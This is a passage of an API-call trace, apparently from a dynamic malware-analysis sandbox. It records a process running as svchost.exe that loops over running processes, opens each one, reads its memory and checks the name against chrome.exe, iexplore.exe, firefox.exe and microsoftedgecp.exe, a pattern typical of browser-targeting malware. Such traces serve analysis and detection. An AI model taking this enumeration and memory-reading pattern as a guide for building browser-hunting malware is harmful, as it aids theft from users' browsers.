	[0232.283] ReadProcessMemory (in: hProcess=0x6d2c, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0232.283] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0232.283] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0232.284] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x6d30
	[0232.284] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.284] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0232.284] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.284] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0232.285] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.285] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0232.285] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.285] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0232.285] NtQueryInformationProcess (in: ProcessHandle=0x6d30, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0232.285] ReadProcessMemory (in: hProcess=0x6d30, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0232.285] ReadProcessMemory (in: hProcess=0x6d30, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0232.286] ReadProcessMemory (in: hProcess=0x6d30, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0232.286] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0232.286] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0232.287] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x6d34
	[0232.287] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.287] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0232.287] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.287] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0232.287] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.287] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0232.288] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.288] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0232.288] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0232.289] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x6d38
	[0232.289] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.289] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0232.289] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.289] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0232.290] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.290] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0232.290] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.290] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0232.290] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0232.291] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x6d3c
	[0232.291] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.291] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0232.291] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.291] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0232.292] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.292] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0232.292] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.292] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0232.292] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0232.293] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0232.294] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0x6d40
	[0232.294] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.294] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0232.294] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.294] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0232.294] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.295] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0232.295] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.295] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0232.295] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0232.296] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa70) returned 0x6d44
	[0232.296] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.296] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0232.296] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.296] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0232.297] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.297] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0232.297] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.297] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0232.297] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0232.298] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc20) returned 0x6d48
	[0232.298] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.298] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0232.298] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.298] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0232.299] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.299] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0232.299] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.299] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0232.299] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1
	[0232.301] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa80) returned 0x6d4c
	[0232.301] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.301] StrStrIA (lpFirst="dllhost.exe", lpSrch="chrome.exe") returned 0x0
	[0232.302] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.302] StrStrIA (lpFirst="dllhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0232.302] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.302] StrStrIA (lpFirst="dllhost.exe", lpSrch="firefox.exe") returned 0x0
	[0232.302] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.302] StrStrIA (lpFirst="dllhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0232.303] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0232.303] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb28) returned 0x6d50
	[0232.303] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.304] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0232.304] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.304] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0232.304] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.304] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0232.305] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.305] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0232.305] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xda0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0232.306] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xda0) returned 0x6d54
	[0232.306] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.306] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0232.306] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.306] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0232.306] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.306] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0232.307] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.307] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0232.307] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xda0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0232.308] CloseHandle (hObject=0x4fd0) returned 1
	[0232.308] Sleep (dwMilliseconds=0x64) 
	[0232.412] GetCurrentProcessId () returned 0x110
	[0232.412] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x4fd0
	[0232.418] Process32First (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0232.420] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0232.422] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0232.424] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x6d58
	[0232.425] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.425] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0232.426] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.426] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0232.426] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.426] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0232.426] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.426] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0232.426] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0232.427] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x6d5c
	[0232.427] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.427] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0232.428] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.428] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0232.428] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.428] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0232.428] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.428] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0232.428] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0232.429] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x6d60
	[0232.429] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.429] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0232.430] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.430] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0232.430] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.430] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0232.430] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.431] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0232.431] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0232.431] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x6d64
	[0232.432] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.432] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0232.432] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.432] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0232.432] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.432] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0232.433] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.433] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0232.433] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0232.434] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x6d68
	[0232.434] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.434] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0232.434] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.434] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0232.434] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.434] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0232.435] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.435] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0232.435] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0232.436] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x6d6c
	[0232.436] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.436] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0232.436] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.436] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0232.437] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.437] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0232.437] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.437] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0232.437] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0232.438] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x6d70
	[0232.438] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.438] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0232.439] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.439] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0232.439] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.439] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0232.439] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.439] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0232.439] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0232.440] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x6d74
	[0232.440] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.440] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0232.441] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.441] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0232.441] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.441] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0232.441] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.441] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0232.442] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0232.442] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x6d78
	[0232.443] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.443] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0232.443] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.443] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0232.443] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.443] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0232.444] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.444] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0232.444] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0232.445] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x6d7c
	[0232.445] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.445] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0232.445] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.445] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0232.445] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.446] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0232.446] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.446] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0232.446] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0232.447] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x6d80
	[0232.447] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.447] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0232.447] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.447] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0232.448] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.448] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0232.448] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.448] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0232.448] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0232.449] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x6d84
	[0232.449] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.449] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0232.450] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.450] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0232.450] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.450] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0232.450] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.450] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0232.451] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
